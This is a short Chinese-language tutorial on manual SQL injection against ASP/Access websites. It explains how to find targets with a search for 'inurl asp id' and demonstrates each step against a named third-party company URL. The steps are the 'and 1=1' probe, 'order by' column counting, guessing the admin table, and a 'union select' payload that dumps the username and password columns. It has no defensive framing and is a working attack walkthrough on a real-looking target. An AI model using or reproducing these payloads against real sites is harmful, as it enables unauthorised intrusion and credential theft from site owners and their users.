手工ACCESS注入方法

百度搜索inurl asp id会出现一大堆相关网站，以目标http://www.cnsgroup.cn/about.asp?id=61为例：

1、在url后添加and 1=1测试是否有注入点
2、然后在后面添加order by 10，访问http://www.cnsgroup.cn/about.asp?id=61 order by 10看能否正常访问，如能正常访问则表示数据库有10个字段，如不能，则变化数字知道测试出来，本网站为5
3、然后构造url为：http://www.cnsgroup.cn/about.asp?id=61 and exist(select * from admin)进行测试数据表名，看表明是user还是admin，或者其他的表名，本网站为admin
4、构造url为:http://www.cnsgroup.cn/about.asp?id=61 and exist(select username from admin)判断列的名称，一般存储账户的列名为username，密码为password
5、构造url为:http://www.cnsgroup.cn/about.asp?id=61 union select 1,2,3,4,5 from admin结果如下
可知此账户名与密码均为第二列和第三列，然后将第二列第三列名称改为select 1,username,password,4,5 from admin就可暴出账户密码

手工注入比较麻烦，可以在网上找一些自动工具，这里只是一些原理，有空可以自己写一写这些工具